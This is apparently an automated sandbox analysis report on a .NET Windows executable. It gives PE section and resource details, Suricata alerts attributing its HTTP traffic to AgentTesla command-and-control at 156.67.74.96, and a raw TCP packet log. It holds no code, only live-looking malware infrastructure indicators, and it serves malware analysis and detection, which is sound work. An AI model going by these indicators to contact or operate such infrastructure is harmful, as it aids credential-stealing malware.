IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2d1a4	0x2d200	d8dc7c6abc35f486a26ee495cf18864e	False	0.3805239352493075	data	5.5492522129400115	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x30000	0x600	0x600	b0895f433994ac3ac5d4d8e7f0a2f885	False	0.404296875	data	4.068192372982984	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x32000	0xc	0x200	0a98ec97dc6199de5f571f11b4f87cb3	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x300a0	0x2cc	data			0.4371508379888268
RT_MANIFEST	0x3036c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-30T01:57:11.475157+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49731	156.67.74.96	80	TCP
2024-12-30T01:57:11.650199+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	49731	156.67.74.96	80	TCP
2024-12-30T01:57:11.814263+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49731	156.67.74.96	80	TCP
2024-12-30T01:57:12.209456+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49732	156.67.74.96	80	TCP
2024-12-30T01:57:12.441504+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	49732	156.67.74.96	80	TCP
2024-12-30T01:57:13.134175+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49734	156.67.74.96	80	TCP
2024-12-30T01:57:13.327024+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	49734	156.67.74.96	80	TCP
2024-12-30T01:57:40.725095+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49742	156.67.74.96	80	TCP
2024-12-30T01:57:40.931828+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	49742	156.67.74.96	80	TCP
2024-12-30T01:57:41.092760+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49742	156.67.74.96	80	TCP
2024-12-30T01:57:51.662633+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49743	156.67.74.96	80	TCP
2024-12-30T01:57:51.883896+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	49743	156.67.74.96	80	TCP
2024-12-30T01:58:12.193806+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49849	156.67.74.96	80	TCP
2024-12-30T01:58:12.209416+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49850	156.67.74.96	80	TCP
2024-12-30T01:58:12.391965+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	49849	156.67.74.96	80	TCP
2024-12-30T01:58:12.425837+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	49850	156.67.74.96	80	TCP
2024-12-30T01:58:12.542245+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49849	156.67.74.96	80	TCP
2024-12-30T01:58:22.615628+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49920	156.67.74.96	80	TCP
2024-12-30T01:58:22.615632+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49921	156.67.74.96	80	TCP
2024-12-30T01:58:22.693833+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49922	156.67.74.96	80	TCP
2024-12-30T01:58:22.816029+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	49921	156.67.74.96	80	TCP
2024-12-30T01:58:22.829424+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	49920	156.67.74.96	80	TCP
2024-12-30T01:58:26.848396+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49953	156.67.74.96	80	TCP
2024-12-30T01:58:26.848398+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49952	156.67.74.96	80	TCP
2024-12-30T01:58:27.209742+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49955	156.67.74.96	80	TCP
2024-12-30T01:58:29.678187+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49973	156.67.74.96	80	TCP
2024-12-30T01:58:29.678196+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49972	156.67.74.96	80	TCP
2024-12-30T01:58:29.869471+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	49972	156.67.74.96	80	TCP
2024-12-30T01:58:29.877609+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	49973	156.67.74.96	80	TCP
2024-12-30T01:58:30.028952+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	49973	156.67.74.96	80	TCP
2024-12-30T01:58:33.537533+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50002	156.67.74.96	80	TCP
2024-12-30T01:58:33.537622+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50001	156.67.74.96	80	TCP
2024-12-30T01:58:33.725951+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50002	156.67.74.96	80	TCP
2024-12-30T01:58:33.765816+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50001	156.67.74.96	80	TCP
2024-12-30T01:58:33.935018+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50001	156.67.74.96	80	TCP
2024-12-30T01:58:35.115585+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50013	156.67.74.96	80	TCP
2024-12-30T01:58:35.305946+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50013	156.67.74.96	80	TCP
2024-12-30T01:58:37.045008+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50023	156.67.74.96	80	TCP
2024-12-30T01:58:37.236687+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50023	156.67.74.96	80	TCP
2024-12-30T01:58:37.394781+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50023	156.67.74.96	80	TCP
2024-12-30T01:58:41.475423+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50024	156.67.74.96	80	TCP
2024-12-30T01:58:41.615740+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50025	156.67.74.96	80	TCP
2024-12-30T01:58:41.679275+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50024	156.67.74.96	80	TCP
2024-12-30T01:58:56.912481+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50026	156.67.74.96	80	TCP
2024-12-30T01:58:56.912527+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50027	156.67.74.96	80	TCP
2024-12-30T01:58:57.084437+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50028	156.67.74.96	80	TCP
2024-12-30T01:58:57.213235+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50027	156.67.74.96	80	TCP
2024-12-30T01:58:57.215163+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50026	156.67.74.96	80	TCP
2024-12-30T01:59:23.258962+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50030	156.67.74.96	80	TCP
2024-12-30T01:59:23.258965+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50029	156.67.74.96	80	TCP
2024-12-30T01:59:23.318745+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50031	156.67.74.96	80	TCP
2024-12-30T01:59:23.447298+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50030	156.67.74.96	80	TCP
2024-12-30T01:59:23.458418+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50029	156.67.74.96	80	TCP
2024-12-30T01:59:46.646832+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50032	156.67.74.96	80	TCP
2024-12-30T01:59:46.646864+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50033	156.67.74.96	80	TCP
2024-12-30T01:59:46.836077+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50032	156.67.74.96	80	TCP
2024-12-30T01:59:46.856659+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50033	156.67.74.96	80	TCP
2024-12-30T01:59:46.986248+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50032	156.67.74.96	80	TCP
2024-12-30T01:59:49.974952+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50034	156.67.74.96	80	TCP
2024-12-30T01:59:49.974952+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50035	156.67.74.96	80	TCP
2024-12-30T01:59:50.164596+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50035	156.67.74.96	80	TCP
2024-12-30T01:59:50.167784+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50034	156.67.74.96	80	TCP
2024-12-30T01:59:50.313831+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50035	156.67.74.96	80	TCP
2024-12-30T01:59:50.600089+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50036	156.67.74.96	80	TCP
2024-12-30T01:59:50.800142+0100	2034579	ET MALWARE AgentTesla Communicating with CnC Server	1	192.168.2.4	50036	156.67.74.96	80	TCP
2024-12-30T01:59:50.951495+0100	2831192	ETPRO MALWARE AgentTesla Communicating with CnC Server M2	1	192.168.2.4	50036	156.67.74.96	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 01:56:54.951067924 CET	49730	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:56:54.956851959 CET	80	49730	158.101.44.242	192.168.2.4
Dec 30, 2024 01:56:54.956938028 CET	49730	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:56:54.957715034 CET	49730	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:56:54.963486910 CET	80	49730	158.101.44.242	192.168.2.4
Dec 30, 2024 01:56:55.522501945 CET	80	49730	158.101.44.242	192.168.2.4
Dec 30, 2024 01:56:55.568794966 CET	49730	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:11.103230953 CET	49731	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:11.108935118 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.109023094 CET	49731	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:11.124106884 CET	49731	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:11.128956079 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.475157022 CET	49731	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:11.480098009 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.650053978 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.650121927 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.650166035 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.650177002 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.650188923 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.650198936 CET	49731	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:11.650247097 CET	49731	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:11.665811062 CET	49731	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:11.666706085 CET	49730	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:11.670592070 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.671705961 CET	80	49730	158.101.44.242	192.168.2.4
Dec 30, 2024 01:57:11.671756983 CET	49730	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:11.814155102 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.814169884 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.814183950 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.814263105 CET	49731	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:11.814536095 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.814590931 CET	49731	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:11.851821899 CET	49731	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:11.853286028 CET	49732	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:11.856645107 CET	80	49731	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.858051062 CET	80	49732	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:11.858109951 CET	49732	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:11.858184099 CET	49732	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:11.862941027 CET	80	49732	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:12.209455967 CET	49732	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:12.214391947 CET	80	49732	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:12.441356897 CET	80	49732	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:12.441375971 CET	80	49732	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:12.441386938 CET	80	49732	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:12.441504002 CET	49732	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:12.442814112 CET	49732	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:12.447700977 CET	80	49732	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:12.447740078 CET	49732	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:12.770978928 CET	49734	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:12.775949955 CET	80	49734	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:12.776050091 CET	49734	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:12.776216984 CET	49734	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:12.781021118 CET	80	49734	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:13.134175062 CET	49734	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:13.139144897 CET	80	49734	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:13.326942921 CET	80	49734	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:13.326962948 CET	80	49734	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:13.326976061 CET	80	49734	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:13.327023983 CET	49734	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:19.281009912 CET	80	49734	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:19.281397104 CET	49734	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:24.361226082 CET	49740	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:24.369271040 CET	80	49740	158.101.44.242	192.168.2.4
Dec 30, 2024 01:57:24.369369030 CET	49740	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:24.369594097 CET	49740	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:24.374465942 CET	80	49740	158.101.44.242	192.168.2.4
Dec 30, 2024 01:57:24.919612885 CET	80	49740	158.101.44.242	192.168.2.4
Dec 30, 2024 01:57:24.959362030 CET	49740	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:32.426542997 CET	49741	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:32.431608915 CET	80	49741	158.101.44.242	192.168.2.4
Dec 30, 2024 01:57:32.433337927 CET	49741	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:32.433602095 CET	49741	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:32.438445091 CET	80	49741	158.101.44.242	192.168.2.4
Dec 30, 2024 01:57:32.981987000 CET	80	49741	158.101.44.242	192.168.2.4
Dec 30, 2024 01:57:33.037477970 CET	49741	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:40.364770889 CET	49742	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:40.369812012 CET	80	49742	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:40.371159077 CET	49742	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:40.371249914 CET	49742	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:40.376113892 CET	80	49742	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:40.725095034 CET	49742	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:40.729985952 CET	80	49742	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:40.931694031 CET	80	49742	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:40.931755066 CET	80	49742	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:40.931793928 CET	80	49742	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:40.931828022 CET	49742	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:40.940134048 CET	49742	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:40.940285921 CET	49740	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:40.944969893 CET	80	49742	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:40.945393085 CET	80	49740	158.101.44.242	192.168.2.4
Dec 30, 2024 01:57:40.945465088 CET	49740	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:41.092346907 CET	80	49742	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:41.092664003 CET	80	49742	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:41.092699051 CET	80	49742	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:41.092731953 CET	80	49742	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:41.092760086 CET	49742	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:41.092789888 CET	49742	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:41.093055964 CET	80	49742	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:41.093107939 CET	49742	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:41.388196945 CET	49741	80	192.168.2.4	158.101.44.242
Dec 30, 2024 01:57:51.307674885 CET	49743	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:51.312766075 CET	80	49743	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:51.315113068 CET	49743	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:51.315201044 CET	49743	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:51.320116043 CET	80	49743	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:51.662632942 CET	49743	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:51.667640924 CET	80	49743	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:51.883547068 CET	80	49743	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:51.883810997 CET	80	49743	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:51.883847952 CET	80	49743	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:51.883882999 CET	80	49743	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:51.883896112 CET	49743	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:51.883924007 CET	49743	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:57:57.783468008 CET	80	49743	156.67.74.96	192.168.2.4
Dec 30, 2024 01:57:57.783935070 CET	49743	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:11.837796926 CET	49734	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:11.838104010 CET	49849	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:11.842617035 CET	80	49734	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:11.842928886 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:11.842995882 CET	49849	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:11.843130112 CET	49849	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:11.847930908 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:11.851600885 CET	49850	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:11.856395960 CET	80	49850	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:11.856447935 CET	49850	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:11.856555939 CET	49850	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:11.861326933 CET	80	49850	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.193805933 CET	49849	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:12.198673964 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.209415913 CET	49850	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:12.214240074 CET	80	49850	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.391660929 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.391722918 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.391760111 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.391769886 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.391779900 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.391964912 CET	49849	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:12.392358065 CET	49849	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:12.397080898 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.425681114 CET	80	49850	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.425693035 CET	80	49850	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.425703049 CET	80	49850	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.425837040 CET	49850	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:12.542103052 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.542114973 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.542125940 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.542244911 CET	49849	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:12.542251110 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.542377949 CET	49849	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:12.542840004 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:12.542907953 CET	49849	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:18.387183905 CET	80	49850	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:18.387340069 CET	49850	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.260385990 CET	49849	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.260535002 CET	49850	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.261800051 CET	49920	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.262061119 CET	49921	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.265187979 CET	80	49849	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.265316963 CET	80	49850	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.266624928 CET	80	49920	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.266881943 CET	80	49921	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.266961098 CET	49920	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.266988993 CET	49921	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.267096996 CET	49920	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.267119884 CET	49921	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.271858931 CET	80	49920	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.271982908 CET	80	49921	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.331751108 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.336519957 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.336771011 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.336937904 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.341730118 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.615628004 CET	49920	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.615632057 CET	49921	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.620378971 CET	80	49920	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.620490074 CET	80	49921	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.693833113 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.698661089 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.698672056 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.698715925 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.698724985 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.698729038 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.698743105 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.698751926 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.698755980 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.698781967 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.698828936 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.698839903 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.698848963 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.698858023 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.698865891 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.698940992 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.703486919 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.703536987 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.703546047 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.703556061 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.703593969 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.703602076 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.703605890 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.703627110 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.703656912 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.707247972 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.707495928 CET	49922	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:22.748889923 CET	80	49922	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:22.748996973 CET	49922	80	192.168.2.4	156.67.74.96
